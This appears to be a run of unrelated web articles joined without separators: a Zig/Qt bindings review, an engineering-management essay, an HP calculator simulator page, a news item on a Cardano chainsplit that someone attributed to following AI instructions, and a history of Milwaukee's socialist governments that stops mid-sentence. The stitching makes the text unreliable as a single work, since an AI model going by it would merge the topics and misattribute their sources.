was an eye-opening experience. Right from the start, I was impressed by how faithfully it exposes Qt’s C++ API while keeping the interface accessible to Zig developers. The library is surprisingly complete, covering most of the widgets, layouts, and common functionality you would expect from a typical Qt project. Despite being maintained by a single developer, the bindings are robust and consistent, which made experimentation smooth and enjoyable.
One thing that stood out is how much control you get over the GUI elements. Every widget, layout, and property is explicit, which forces you to think about your UI structure carefully. Unlike higher-level frameworks that abstract away the details,
libqt6zig
lets you handle memory management, widget hierarchies, and layout logic directly. This level of control can be intimidating at first, but it quickly becomes empowering once you get used to it. You feel like you are working with the core of the system rather than relying on layers of abstraction.
At the same time, the library has some limitations. Working with opaque pointers can feel risky because it removes compile-time type safety, and the lack of certain abstractions like generics or a
QTNativeWindow
wrapper means you occasionally need to write more boilerplate. However, these trade-offs are manageable, and the experience is educational. You learn not only how Qt works but also how to structure a cross-platform GUI application effectively in Zig.
Overall, my experience with
libqt6zig
was extremely positive. It made creating a fully functional shopping list application straightforward and even enjoyable. The library is well-documented, the API feels natural for Zig, and the bindings handle the low-level details so you can focus on building your application rather than wrestling with the underlying system. The potential for future improvements is exciting, and I look forward to seeing how the library evolves.
Conclusion
In conclusion, using
Zig
with
libqt6zig
provides a powerful combination for building cross-platform GUI applications. While it requires attention to memory management and pointer safety, the explicitness and control make it a rewarding experience. You can produce functional, responsive, and visually appealing applications with surprisingly little code.
For anyone interested in exploring GUI development in Zig,
libqt6zig
is an excellent starting point. It demonstrates that Zig can be used effectively beyond systems programming, opening the door to lightweight, high-performance desktop applications. The library is already impressive, and with continued development, it could become a go-to choice for Zig developers looking to build modern GUIs. My experiments with both the shopping list application and my Hyperland launcher showed that even complex interactions are achievable with patience and careful design. Overall, this experience reinforced my enthusiasm for Zig and its growing ecosystem, and it leaves me optimistic about the future of GUI development in this language.
References and Resources
If you want to explore
libqt6zig
yourself or learn more about the library and its author, here are some useful links:
As I get older, I increasingly think about
whether I’m spending my time the right way
to advance my career and my life.
This is also a question that your company
asks about you every performance cycle:
is this engineering manager spending their
time effectively to advance the company or their organization?
Confusingly, in my experience, answering these nominally similar questions
has surprisingly little in common.
This piece spends some time exploring both questions in the particularly
odd moment we live in today, where managers are being told they’ve
spent the last decade doing the wrong things, and need to engage
with a new model of engineering management in order to be
valued by the latest iteration of the industry.
If you’d be more interested in a video version of this,
here is the recording of a practice run I gave for a talk
centered on these same ideas
(
slides from talk
).
Good leadership is a fad
When I started my software career at Yahoo in the late 2000s, I had two 1:1s with my manager over the course of two
years. The first one came a few months after I started, and he mostly asked me about a colleague’s work quality.
The second came when I gave notice that I was leaving to
join Digg
.
A modern evaluation of this manager would be scathing, but his management style closely resembled that of the
team leader in
The Soul of A New Machine
:
identifying an important opportunity for the team, and navigating the broader organization that might impede progress
towards that goal.
He was, in the context we were working in, an effective manager.
Compare that leadership style to the expectations of the 2010s, where attracting, retaining, and motivating engineers
was emphasized as the most important leadership criteria in many organizations.
This made sense in
the era of hypergrowth
, where budgets were uncapped
and many companies viewed hiring strong engineers as their constraint on growth.
This was an era where managers were explicitly told to stop writing software as the first step of their transition into management,
and it was good advice! Looking back we can argue it was bad guidance by today’s standards, but it aligned the managers with the leadership expectations
of the moment.
Then think about our current era, that started in late 2022, where higher interest rates killed
zero-interest-rate-policy (ZIRP)
and productized large language models are positioned as killing deep Engineering organizations.
We’ve flattened Engineering organizations where many roles that previously focused on coordination
are now expected to be hands-on keyboard, working deep in the details.
Once again, the best managers of the prior era–who did exactly what the industry asked them to do–are now reframed as bureaucrats
rather than integral leaders.
In each of these transitions, the business environment shifted, leading to a new formulation of ideal leadership.
That makes a lot of sense: of course we want leaders to fit the necessary patterns of today.
Where things get weird is that in each case a morality tale was subsequently superimposed on top of the transition:
In the 2010s, the morality tale was that it was all about empowering engineers as a fundamental good.
Sure, I can get excited for that, but I don’t really believe that narrative: it happened because hiring was competitive.
In the 2020s, the morality tale is that bureaucratic middle management have made organizations stale and inefficient.
The lack of experts has crippled organizational efficiency.
Once again, I can get behind that–there’s truth here–but the much larger drivers aren’t about morality,
it’s about ZIRP-ending and optimism about productivity gains from AI tooling.
The conclusion here is clear: the industry will want different things from you as it evolves,
and it will tell you that each of those shifts is because of some complex moral change,
but it’s pretty much always about business realities changing.
If you take any current morality tale as true, then you’re setting yourself up
to be severely out of position when the industry shifts again in a few years,
because “good leadership” is just a fad.
Self-development across leadership fads
If you accept the argument that the specifically desired leadership skills of today
are the result of fads that frequently shift, then it leads to an important followup question:
what are the right skills to develop in to be effective today and to be impactful across fads?
Having been and worked with engineering managers for some time, I think there are
eight foundational engineering management skills
,
which I want to personally group into two clusters: core skills that are essential to operate in all roles
(including entry-level management roles), and growth skills whose presence–or absence–determines
how far you can go in your career.
The core skills are:
Execution
: lead team to deliver expected tangible and intangible work.
Fundamentally, management is about getting things done, and you’ll neither
get an opportunity to begin managing, nor stay long as a manager, if your
teams don’t execute.
Team
: shape the team and the environment such that they succeed.
This is
not
working for the team, nor is it working for your leadership, it is
finding the balance between the two that works for both.
Examples
: hiring, coaching, performance management, advocate with your management
Ownership
: navigate reality to make consistent progress, even when reality is difficult
Finding a way to get things done, rather than finding a way that it not getting done is someone else’s fault.
Examples
: doing hard things, showing up when it’s uncomfortable, being accountable despite systemic issues
Alignment
: build shared understanding across leadership, stakeholders, your team, and the problem space.
Finding a realistic plan that meets the moment, without surprising or being surprised by those around you.
Examples
: document and share top problems, and updates during crises
The growth skills are:
Taste
: exercise discerning judgment about what “good” looks like—technically, in business terms, and in process/strategy.
Taste is a broadchurch, and my experience is that broad taste is an somewhat universal criteria for truly senior roles.
In some ways, taste is a prerequisite to Amazon’s
Are Right, A Lot
.
Examples
: refine proposed product concept,
avoid high-risk rewrite,
find usability issues in team’s work
Clarity
: your team, stakeholders, and leadership know what you’re doing and why, and agree that it makes sense.
In particular, they understand how you are overcoming your biggest problems. So clarity is not, “Struggling with scalability issues”
but instead “Sharding the user logins database in a new cluster to reduce load.”
Examples
: identify levers to progress,
create plan to exit a crisis,
show progress on implementing that plan
Navigating ambiguity
: work from complex problem to opinionated, viable approach.
If you’re given an extremely messy, open-ended problem, can you still find a way to make progress?
(I’ve
written previously about this topic
.)
Examples
: launching a new business line,
improving developer experience,
going from 1 to N cloud regions
Working across timescales
: ensure your areas of responsibility make progress across both the short and long term.
There are many ways to appear successful by cutting corners today, that end in disaster tomorrow.
Success requires understanding, and being accountable for, how different timescales interact.
Examples
: have an explicit destination,
ensure short-term work steers towards it,
be long-term rigid and short-term flexible
Having spent a fair amount of time pressure testing these, I’m pretty sure most effective managers, and manager archetypes, can be fit into these boxes.
Self-assessing on these skills
There’s no perfect way to measure anything complex, but here are some thinking
questions for you to spend time with as you assess where you stand on each of these skills:
Execution
When did your team last have friction delivering work? Is that a recurring issue?
What’s something hard you shipped that went really, really well?
When were you last pulled onto solving a time-sensitive, executive-visible project?
Team
Who was the last strong performer you hired?
Have you retained your strongest performers?
What strong performers want to join your team?
Which peers consider your team highly effective?
When did an executive describe your team as exceptional?
Ownership
When did you or your team overcome the odds to deliver something important? (Would your stakeholders agree?)
What’s the last difficult problem you solved that stayed solved (rather than reoccurring)?
When did you last solve the problem first before addressing cross-team gaps?
Alignment
When was the last time you were surprised by a stakeholder? What could you do to prevent that reoccuring?
How does a new stakeholder understand your prioritization tradeoffs (incl rationale)?
When did you last disappoint a stakeholder without damaging your relationship?
What stakeholders would join your company because they trust you?
Taste
What’s a recent decision that is meaningfully better because you were present?
If your product counterpart left, what decisions would you struggle to make?
Where’s a subtle clarification that significantly changed a design or launch?
How have you inflected team’s outcomes by seeing around corners?
Clarity
What’s a difficult trade-off you recently helped your team make?
How could you enable them to make that same trade-off without your direct participation?
What’s a recent decision you made that was undone? How?
Navigating ambiguity
What problem have you worked on that was stuck before assisted, and unstuck afterwards?
How did you unstick it?
Do senior leaders bring ambiguous problems to you? Why?
Working across timescales
What’s a recent trade off you made between short and long-term priorities?
How do you inform these tradeoffs across timescales?
What long-term goals are you protecting at significant short-term cost?
Most of these questions stand on their own, but it’s worth briefly explaining
the “Have you ever been pulled into a SpecificSortOfProject by an executive?” questions.
My experience is that in most companies, executives will try to poach you onto their most
important problems that correspond to your strengths.
So if they’re never attempting to pull you in then either you’re not considered as particularly
strong on that dimensions, or you’re already very saturated with other work such that it doesn’t
seem possible to pull you in.
Are “core skills” the same over time?
While those groupings of “core” and “growth” skills are obvious groupings to me,
what I came to appreciate while writing this is that some skills swap between core to growth
as the fads evolve.
Where
execution
is a foundational skill today, it was less of a core skill in the hypergrowth era,
and even less in the investor era.
This is the fundamentally tricky part of succeeding as an engineering manager across fads:
you need a sufficiently broad base across each of these skills to be successful, otherwise
you’re very likely to be viewed as a weak manager when the eras unpredictably end.
Stay energized to stay engaged
The “
Manage your priorities and energy
” chapter in
The Engineering Executive’s Primer
captures an important reality that took me too long to understand:
the perfect allocation of work is not the mathematically ideal allocation that maximizes impact.
Instead, it’s the balance between that mathematical ideal and doing
things that energize you enough to stay motivated over the long haul.
If you’re someone who loves writing software, that might involve writing a bit more than helpful to your team.
If you’re someone who loves streamlining an organization, it might be improving a friction-filled process that is a personal affront, even if it’s not causing
that much
overall inefficiency.
Forty-year career
Similarly to the question of prioritizing activities to stay energized, there’s also understanding
where you are in your career, an idea I explored in
A forty-year career
.
For each role, you have the chance to prioritize across different dimensions like pace, people, prestige, profit, or learning.
There’s no “right decision,” and there are always tradeoffs.
The decisions you make early in your career will compound over the following forty years.
You also have to operate within the constraints of your life today and your possible lives tomorrow.
Early in my career, I had few responsibilities to others, and had the opportunity to work extremely hard
at places like Uber. Today, with more family responsibilities, I am unwilling to make the tradeoffs to
consistently work that way, which has real implications on how I think about which roles to prioritize
over time.
Recognizing these tradeoffs, and making them deliberately, is one of the highest value things you can do
to shape your career. Most importantly, it’s extremely hard to have a career at all if you don’t think about
these dimensions and have a healthy amount of self-awareness to understand the tradeoffs that will allow you
to stay engaged over half a lifetime.
Nonpareil is a high-fidelity simulator for calculators. It currently
supports many HP calculators models introduced between 1972 and 1982.
Simulation fidelity is achieved through the use of the actual microcode
of the calculators, thus in most cases the simulation behavior exactly
matches that of the real calculator. In particular, numerical results
will be identical, because the simulator is using the BCD arithmetic
algorithms from the calculator.
Nonpareil is not an HP product, and is not supported or warranted
by HP.
Calculator Models
Nonpareil currently simulates many calculators that were developed and
introduced by from 1972 to 1982 by:
HP Advanced Products Division in Cupertino, California
HP Corvallis Division in Corvallis, Oregon
models which HP Fort Collins division adapted from base designs by
APD or Corvallis Division.
Models numbers shown are currently simulated by Nonpareil, unless
struck out.
Support for additional models will be added over time.
Classic
Woodstock
Topcat/Sting
Cricket
Spice
Coconut
Voyager
Scientific
HP-35
HP-45
HP-46
HP-55
HP-65
HP 9805
HP-21
HP-25
HP-25C
HP-29C
HP-67
HP-91
HP-95C
HP-97
HP-97S
HP-19C
HP-31E
HP-32E
HP-33E
HP-33C
HP-34C
HP-41C
HP-41CV
HP-41CX
HP-10C
HP-11C
HP-15C
Financial
HP-70
HP-80
HP-81
HP-22
HP-92
HP-37E
HP-38E
HP-38C
HP-12C
Scientific/Financial
HP-27
Other
HP-10
HP-01
HP-16C
processor architecture
Classic
Woodstock
Cricket
Woodstock
Nut
The HP-67 is considered by many people to be part of the Classic series
since it is packaged similarly to the HP-65, but electrically it is
really a Woodstock series machine.
The classic series chip set was also used in the HP-46 and HP-81, which
were desktop printing versions of the HP-45 and HP-80, respectively, and
the HP 9805A desktop calculator. The same chip set was also used in the
HP 1722A Oscilliscope, the HP 3380A Integrator (for Gas Chromatography),
and in several HP Gas Chromatographs.
The HP-27 was HP's only combined scientific/financial calculator until
the HP-27S was introduced in 1986.
The HP-10 was a basic four-function printing non-RPN calculator.
The HP-01 is a calculator watch (non-RPN). While all the other models
listed here use a 56-bit (14-digit) word, the HP-01 uses a 48-bit
(12-digit) word. The processor architecture is otherwise similar to
Woodstock.
Download
Nonpareil is made available under the terms of the Free Software Foundation's
General Public License, Version 2
. There is
NO WARRANTY
for Nonpareil.
Source code is available from a
Github repository
. Precompiled binaries are not currently avaialble.
Microcode for supported calculator models is included in the Nonpareil
source code distribution.
Microcode-Level Calculator Simulation
PDF, 485K, presented at the HHC 2004 conference in San Jose, California on 26-SEP-2004 (complete with errors; for instance, the IBM System/360 was introduced in 1964, not 1961)
Credits
David G. Hicks of the
Museum of HP
Calculators
has provided scanned images of the calculators for use in
Nonpariel.
Maciej Bartosiak improved the display code of my earlier
NSIM
simulator enough that I now use its rendered output as the background
graphic for the HP-41CV for Nonpareil.
David G. Hicks has ported the simulator portion of an earlier release
to Java and made it available as an
applet
that may be run in Java-enabled web browsers.
Egan Ford has ported Nonpareil to the
Sharp Zaurus
,
and reports that it should work on the Nokia N810 web tablet as well.
Maciej Bartosiak has developed a
Mac OS X port
of
Nonpareil as well as a port of my earier
nsim
HP-41C simulator.
Cardano founder calls the FBI on a user who says his AI mistake caused a chainsplit
Web3 Is Going Great
web3isgoinggreat.com
2025-11-23 20:02:56
On November 21, the Cardano blockchain suffered a major chainsplit after someone created a transaction that exploited an old bug in Cardano node software, causing the chain to split. The person who submitted the transaction fessed up on Twitter, writing, "It started off as a 'let's see if I...
On November 21, the Cardano blockchain suffered a major chainsplit after someone created a transaction that exploited an old bug in Cardano node software, causing the chain to
split
. The person who submitted the transaction fessed up on Twitter, writing, "It started off as a 'let's see if I can reproduce the bad transaction' personal challenge and then I was dumb enough to rely on AI's instructions on how to block all traffic in/out of my Linux server without properly testing it on testnet first, and then watched in horror as the last block time on explorers froze."
Charles Hoskinson, the founder of Cardano, responded with a tweet boasting about how quickly the chain recovered from the catastrophic split, then accused the person of acting maliciously. "It was absolutely personal", Hoskinson wrote, adding that the person's public version of events was merely him "trying to walk it back because he knows the FBI is already involved". Hoskinson added, "There was a premeditated attack from a disgruntled [single pool operator] who spent months in the Fake Fred discord actively looking at ways to harm the brand and reputation of IOG. He targeted my personal pool and it resulted in disruption of the entire cardano network."
Hoskinson's decision to involve the FBI horrified some onlookers, including one other engineer at the company who publicly quit after the incident. They wrote, "I've fucked up pen testing in a major way once. I've seen my colleagues do the same. I didn't realize there was a risk of getting raided by the authorities because of that + saying mean things on the Internet."
In 1910, Milwaukee’s socialists swept into office and they proceeded to run the city for most of the next fifty years. Though ruling elites initially predicted chaos and disaster, even
Time
magazine by 1936 felt obliged to run a cover
story
titled “Marxist Mayor” on the city’s success, noting that under socialist rule “Milwaukee has become perhaps the best-governed city in the US.”
This experience is rich in lessons for Zohran Mamdani and contemporary Left activists looking to lean on City Hall to build a working-class alternative to Democratic neoliberalism and Donald Trump’s authoritarianism. But the history of Milwaukee’s so-called sewer socialists is much more than a story simply about local Left governance. The rise and effectiveness of the town’s socialist governments largely depended on a radical political organization rooted in Milwaukee’s trade unions and working class.
Nowhere in the US were socialists stronger than in Milwaukee. And Wisconsin was the state with the most elected socialist officials as well as the highest number of socialist legislators (see Figure 1). It was also the only state in America where socialists consistently led the entire union movement — indeed, it was primarily their roots in organized labor that made their electoral and policy success possible, including the
passage
of 295 socialist-authored bills statewide between 1919 and 1931.
Figure 1. Source: James Weinstein, The Decline of Socialism in America (1967), 118.
Contrary to what much of the literature on sewer socialism has suggested, the party’s growth did not come at the cost of dropping radical politics. That they didn’t get closer to overthrowing capitalism was due to circumstances outside of their control, including relatively conservative public opinion. And the fact that they
did
achieve so much was because they flexibly concretized socialist politics for America’s
uniquely challenging
context.
The Rise of Sewer Socialism
Sewer socialism’s rise was far from automatic or rapid. Though Milwaukee’s largely German working class was perhaps somewhat more open to socialist ideas than some other ethnicities, a quantitative
study
of pre-war US immigrant voting found that Germans were
negatively
correlated with socialist votes nationwide.
Figure 2 captures the party’s slow-but-steady rise over many decades. Here’s how the party’s founder,
Victor Berger
, described this dynamic in a speech following their big 1910 mayoral election victory:
“It took forty years to get a Socialist Mayor and administration in Milwaukee since first a band of comrades joined together. … It didn’t come quickly or easily to us. It meant work. Drop by drop until the cup ran over. Vote by vote to victory. Work not only during the few weeks of the campaign, but every month, every week, every day. Work in the factories and from house to house.”
Figure 2. Data compiled by author.
Milwaukee’s history is a useful natural experiment for testing the viability of competing socialist strategies in the US. Both moderate and intransigent variants of Marxism were present and the latter had nearly a two-decade-long head start. The Socialist Labor Party (SLP) was the only game in town from 1875 onwards until Berger, a former SLP member, founded a more moderate rival socialist newspaper,
Vorwärts
(Forward), in 1893.
By the early nineties, the SLP under the leadership of Daniel De Leon had crystallized its strategy: run electoral campaigns to propagate the fundamental tenets of Marxism and build industrial unions to displace the reformist, craft-based American Federation of Labor (AFL). Had American workers been more radically inclined, the SLP’s strategy
could
have caught on — indeed, something close to this approach
guided
the early German Social Democracy as well as revolutionary Marxists across imperial Russia. But by 1900, Berger’s Social Democratic Party (SDP) had clearly eclipsed its more-radical rivals.
Victor Berger (right) with Eugene Debs. Berger recruited Debs to socialism in 1895, while the latter was imprisoned in Woodstock, IL.
Pragmatic Marxism
What were the politics of Berger’s new current? Berger and his comrades are usually
depicted
as “reformists” for whom “change would come through evolution and democracy, and not through revolution.” In reality, the sewer socialists were — and
remained
—
committed Marxists
who saw the fight for reforms as a necessary means not only to improve the lives of working people, but also to strengthen working-class consciousness, organization, and power in the direction of socialist revolution in the US and across the globe.
Here’s how Berger articulated this vision in the founding 1911 issue of
The
Milwaukee Leader
, his new English-language socialist daily newspaper: “The distinguishing trait of Socialists is that they understand the class struggle” and that “they boldly aim at the revolution because they want a radical change from the present system.”
Issue One of The Milwaukee Leader, with a cartoon of the newspaper’s ship sinking capitalism (1911).
Reacting against De Leon’s doctrinaire rigidity and marginality, Berger consciously sought to Americanize scientific socialism. Berger argued that socialists in the US “must give up forever the slavish imitation of the ‘German’ form of organization and the ‘German’ methods of electioneering and agitation.” Since the specifics of what to do in the US were not self-evident, this strategic starting point facilitated a useful degree of political humility and empirical curiosity.
One of the things Berger learned was that socialist propaganda would not widely resonate as long as most American workers remained resigned to their fate. This, he explained, was the core flaw in the SLP’s assumption that patiently preaching socialism would eventually convince the whole working class:
The most formidable obstacle in the way of further progress—and especially in the propaganda of Socialism—is not that men are insufficiently versed in political economy or lacking in intelligence. It is that people are without hope. … Despair is the chief opponent of progress. Our greatest need is hope.
It was precisely to overcome widespread feelings of popular resignation that the sewer socialists came to focus so much on fights for immediate demands, both at work and within government. Since “labor learns in the school of experience,” successful struggles even around relatively minor issues would tend to raise workers’ confidence, expectations, and openness to socialist ideas.
It was easy to play with “revolutionary phrases,” but Berger noted that this did not do much to move workers closer to socialism. While it was important to continue propagating the big ideas of socialism, what America’s leftists needed above all was “concrete political achievements, not theoretical treatises ... less mouth-work, more footwork.” Armed with this orientation, Berger and his comrades set out to win over a popular majority — starting with Milwaukee’s trade union activists.
Cartoon from
The Milwaukee Leader
(1911) showing Berger’s socialism car knocking over the profiteers and political opposition.
Rooting Socialism in the Unions
By the time Berger arrived on the scene, Milwaukee already had a rich tradition of
workplace militancy
and unionism. Crucially, Berger’s current sought to transform established unions rather than enter into competition with them by setting up new socialist-led unions, as was the practice of the SLP and, later on, the Wobblies.
Years of hard work within the unions paid off. In December 1899, Milwaukee’s Federated Trades Council elected an executive committee made up entirely of socialists, including Berger. For the next quarter century, the leadership of the party and the unions statewide formed an “interlocking directorate” of working-class socialists involved in both formations. Nowhere else in the US did socialists become so hegemonic in the labor movement as they did in Milwaukee and Wisconsin.
A historian of Milwaukee unions
notes
the “inheritance Socialists bequeathed to the labor movement”: democratic norms; support for industrial (rather than craft) unionism; the absence of corruption; support for workers’ education; and strong political advocacy. Wisconsin’s socialists could not have achieved much without their union base. And precisely because they had succeeded in transforming established AFL unions by “boring from within,” they fought a relentless two-front
war
nationally against the self-isolating dual unionist efforts of left-wing Socialists and the Wobblies, on the one hand, and the narrow-minded AFL leadership of Samuel Gompers, on the other.
Building the Party
The anti-Socialist
Milwaukee Free Press
ruefully noted in 1910 that “there would not today be such sweeping Social-Democratic victories in Milwaukee if that party did not possess a solidarity of organization and purpose which is unequaled by that of any other party in the county, or, for that matter, in the state.”
Building this machine took years of experimentation and refinement under the guidance of Edmund Melms, an affable factory worker. Such a focus on organizing, with its focus on developing new working-class leaders, was crucial for helping Milwaukee’s socialists avoid the constant turnover and churn that undermined so many other SPA chapters.
SDP comrades preparing a “bundle brigade.” Source:
History of the Milwaukee Social-Democratic Victories
(1911).
One of Melms’s organizational innovations was the party’s soon-to-be famous “bundle brigade.” During electoral campaigns, between 500 and 1,000 party members on Sunday mornings would pick up the SDP’s four-page electoral newspaper at 6 a.m. and deliver it to every home in town by 9 a.m. No other parties attempted anything this ambitious because they lacked sufficient volunteer capacity, not just for delivery but also for determining the language spoken in each house; party members would have to canvass their neighborhoods ahead of time to determine whether the house should receive literature in German, English, or Polish.
Melms’s second innovation was to hold a Socialist carnival every winter. These were massive events with over 10,000 participants, attracting (and raising funds from) community members well beyond the SDP’s ranks. In addition to these yearly carnivals, the party held all sorts of social activities which helped grow and cohere the movement. These included picnics, parades, card tournaments, dress balls, parties, concerts, baseball and basketball games, plays, and vaudeville shows. And some party branches were particularly proud of their singers. As one participant recalled, “Did you love song? Attend an affair of Branch 22.”
Students of the South Side Socialist Sunday School (1917). Source: Milwaukee Public Library
Whereas patronage and graft greased the wheels of other party machines, the socialists had to depend on selflessness derived from political commitment. While most people who voted for the SDP were interested primarily in winning immediate changes, there were also additional, loftier motivations undergirding the decision of so many working-class men, women, and teenagers to do thankless tasks like getting up early on cold Sunday mornings to distribute socialist literature. Historian-participant Elmer Beck is
right
that “the dreams, visions, and prophecies of the socialists … were an extremely vital factor in the rise of the socialist tide.”
Message and Demands
With its eyes planted on the goal of winning a majority of Milwaukeeans and Wisconsinites to socialism, the SDP was obsessed with spreading its message. Between 1893 and 1939, the party published twelve weekly newspapers, two dailies, one monthly magazine, as well as countless pamphlets and fliers.
Class consciousness was the central political point stressed in all the party’s agitation and publications — virtually everything was framed as a fight of workers against capitalists. Linked to this class analysis was a relentless focus on workers’ material needs: for instance, one of the SDP’s most impactful early leaflets was directed at working-class women: “Madam—how will you pay your bills?” This relentless focus on workers’ material needs was one of the key reasons the SDP was able to build such a deep base. Indeed, the party’s ability to recruit — and retain — so many workers depended on delivering tangible improvements to their lives (unlike so many other SPA chapters, who had to rely on ideological recruitment alone).
After 1904, immediate demands took on an increasingly central place in the SDP’s election campaigns. Had Milwaukee’s socialists lost sight of their socialist goals? Hardly. Up through its demise in the late 1930s, the party never ceased propagandizing for socialism and proposing ambitious but not-yet-winnable reforms. But Milwaukee’s sewer socialists believed that running to win in electoral contests — and seriously fighting to pass policy changes once in power — made it possible to recruit a larger, not smaller, number of workers to socialist politics.
Cartoon from
The Milwaukee Leader
(1911)
The comparative data on party membership bears out this hypothesis. By 1912, roughly one out of every hundred people in Milwaukee
was
a member of the Social Democratic Party. No other city in America had anything close to this level of strength; in contrast, New York City, another socialist bastion, had one member for every thousand inhabitants. Had the Socialist Party of America been as strong as Milwaukee’s SDP, it would have had about one million members — roughly the same size as German Social Democracy, the world’s largest socialist party.
In a challenging American political context, Wisconsin’s socialists pushed as far as possible without losing their base. Rigorous
comparative histories
of US leftism have shown that
all
of the most successful instances of mass working-class politics in America have adopted some form of this kind of pragmatic radicalism, including Minnesota’s
Farmer-Labor Party
, New York’s
Jewish
immigrant socialism, and the
Popular Front Communists
of the late 1930s.
Nevertheless, far left socialists elsewhere in the country — whose tactical rigidity was both a cause and consequence of their weaker roots in the class — frequently criticized their Wisconsin comrades’ supposed “opportunism.” In 1905, for example, the national leadership of the SPA expelled Berger from the body for suggesting in an article that Milwaukeeans vote against a right-wing judge in a non-partisan race that the party did not have the capacity to contest. Berger
lambasted
this “heresy hunt without a heresy” and he succeeded in winning back his post through an SPA membership referendum, the national (and local) party’s highest decision-making structure. Episodes such as these led the SDP to jealously guard its autonomy from national Socialist Party of America structures that periodically succumbed to leftist dogmatism.
Successfully Governing Milwaukee
It was a challenging task, requiring constant wagers and adjustments, to pull the mass of working people toward socialism without undermining this process by jumping too far ahead. “Never swing to the right or too far to the left,” advised Daniel Hoan, the party’s mayor from 1916 through 1940. But concretizing this axiom into practical politics was easier said than done — especially once the party had to govern.
Given the powerful forces arrayed against them, and the
unique obstacles
facing radical politics in the US, the remarkable thing about the sewer socialist administrations is how much they achieved. Under SDP rule, Milwaukee dramatically improved health and safety conditions for its citizens in their neighborhoods as well as on the job. Milwaukee built up the country’s first public housing cooperative and it pioneered city planning through comprehensive zoning codes. And though the SDP did not advance as far as it wanted in ending private contracts for all utilities, it succeeded in building a city-owned power plant and municipalizing the stone quarry, street lighting, sewage disposal, and water purification.
Another crown jewel of sewer socialism was its dramatic expansion of parks and playgrounds, as well as its creation of over 40 social centers across Milwaukee. The city leaned on school infrastructure to set up these centers, which provided billiards for teens, education classes and public events for adults, plus sports, games and entertainment for all. “During working hours, we make a living and during leisure hours, we make a life,” was the motto coined by
Dorothy Enderis
, who headed the parks and recreation department after 1919.
The city’s excellent provision of recreation, services, and material relief was, according to Mayor Hoan, responsible for it having one of the lowest crime rates of any big city in the nation. In his fascinating 1936 book
City Government: The Record of the Milwaukee Experiment,
Hoan writes that in “Milwaukee we have held that crime prevention [via attacking its social roots] is as important, if not more so, if a comparison is possible, than crime detection and punishment.” Comparing the cost of policing to the cost of social services, Hoan estimated that the city saved over $1,200,000 yearly via its robust parks and recreation department. This did not mean Milwaukee ever considered defunding its police. Sewer socialists in fact pushed for better wages and working conditions for cops, in a relatively successful attempt to win away rank-and-file police from their reactionary chief John Janssen.
After the first significant migration of Black workers arrived in World War I, Mayor Hoan led a
hard fight
against the Ku Klux Klan in the city, while Victor Berger (breaking from his earlier racial chauvinism)
led
a parallel, high-profile fight in Congress against lynching as well as against immigration restrictions. As historian Joe Trotter
notes
, Milwaukee’s Black workers responded by consistently voting Socialist and leaders of the town’s Garveyite Universal Negro Improvement Association joined the SDP and agitated for its candidates.
“Socialist Outing,” from the Milwaukee Public Library’s Socialist Party Collection
Ending graft and promoting governmental efficiency was another major focus. One of the first steps taken by Emil Seidel, the party’s mayor from 1910 through 1912, was to set up a Bureau of Economy and Efficiency — the nation’s first, tasked with streamlining governance. Despite the protestations of some party members, Socialist administrations did not prioritize giving posts to SDP members. Mayor Hoan defended the merit system on anti-capitalist grounds: “You must show the working people and the citizens of the city that the city is as good as and better an employer than private industry if you are to gain headway in convincing them that the municipality is a better owner of the public utilities and industries than private corporations.”
Boosting the public’s confidence in governmental initiatives eventually made it possible for Mayor Hoan to push the limits of acceptability regarding city incursions into the free market. Before and following World War I, Hoan — without city council approval —
purchased
train carloads of surplus foods and clothing from the US Army and sold them to the public far below market prices at city offices. The project’s scope was ambitious: in January 1920 alone, Hoan purchased 72,000 cans of peas, 33,600 cans of baked beans, 100,000 pounds of salt, 20,000 pairs of knit gloves and wool socks, among other items. Basking in the project’s success, the mayor noted that “the public sale of food by me has offered an opportunity of demonstrating the Socialist theory of operating a business. It should demonstrate once and for all that the Socialist theory in conducting many of our enterprises without profits can be worked out in a grand and beneficial manner if handled by those who believe in its success.”
In contrast with progressive city administrations nationwide, Milwaukee socialists believed that effective governmental change depended to a large degree on bottom-up organizing. A sense of this can be gleaned from the
Milwaukee Free Press
’s story about the SDP’s rally the night it won the mayoral race in 1910:
A full ten minutes the crowd stood up on its feet and cheered for Victor Berger; waved flags and tossed hats high in the air; cried and shouted and even wept, for very overflowing of joy. Then Mr. Berger stepped forward, and a hush fell upon the audience as he began to speak. “I want to ask every man and woman in this audience to stand up here and now enter a solemn pledge to do everything in our power to help the men whom the people have chosen to fulfill their duty,” said Mr. Berger. Like a mighty wave of humanity, the crowd surged to its feet, and in a shout that shook the building and echoed down the street to the thousands who waited there, gave the required pledge.
Grassroots pressure became increasingly urgent once the party lost its short-lived control over the city council. Given Mayor Hoan’s lack of a majority, historian John Gurda
notes
that he chose to “take a populist approach to governing, appealing directly to the citizens of Milwaukee to support his reforms and pressure the non-partisan aldermen to support them as well.” The same strategy informed the party’s
approach
on a statewide level, leading the SDP to power-map the legislature to figure out pressure points to flip movable office-holders.
Socialist administrations also did everything possible to boost union power. Union labor was used on all city construction and printing projects. With city backing, a unionization wave swept the city’s firemen, garbage collectors, coal passers, and elevator operators, among others. Mayor Seidel even threatened to swear in striking workers as police deputies if the police chief attempted to intimidate strikers.
And in 1935 the SDP succeeded in passing America’s strongest labor law: the “Boncel Ordinance,” which empowered the city administration to close the plants of any company that refused to collectively bargain and whose refusal resulted in crowds of over 200 people two days in a row. Employers who refused to comply would be fined or imprisoned. With support from governmental policy above and workplace organizing below, Milwaukee County’s union density grew tenfold from 1929 through 1939. By the end of the 1930s roughly
60 percent
of its workers were in unions. In contrast, New York City at its peak only reached a union density of at most 33 percent.
Mayor Daniel Hoan speaking in front of the Seaman auto plant during a strike. Wisconsin Historical Society.
Demise
Despite labor’s upsurge and the SDP’s continued efforts to educate the public about socialism, the movement’s forward advance was significantly constrained by employer opposition and
public opinion
, which as ever was shaped by America’s uniquely challenging terrain, as well as media scaremongering and the normal, expectations-lowering
pull
of capitalist social relations.
By the late 1930s,
backlash
against union militancy and governmental radicalism had begun to take an electoral toll in Wisconsin and nationwide. Incensed by Mayor Hoan’s refusal to impose an austerity budget, employers had waged a “war” to recall him in 1933. Though they lost that battle, Milwaukee’s bourgeois establishment succeeded in convincing a majority of voters to defeat the SDP’s subsequent referendum to municipalize the electric utility. In 1940, Hoan decisively lost the mayoral race to a handsome but politically vacuous centrist named Carl Zeidler. Sewer socialism’s reign was over. (Another Socialist, Frank Zeidler, became mayor of Milwaukee from 1948 through 1960, but by this time the party was a shell of its former self.)
The central obstacle to moving further toward social democracy and socialism in America was simple: the organized Left and its allied unions were
not
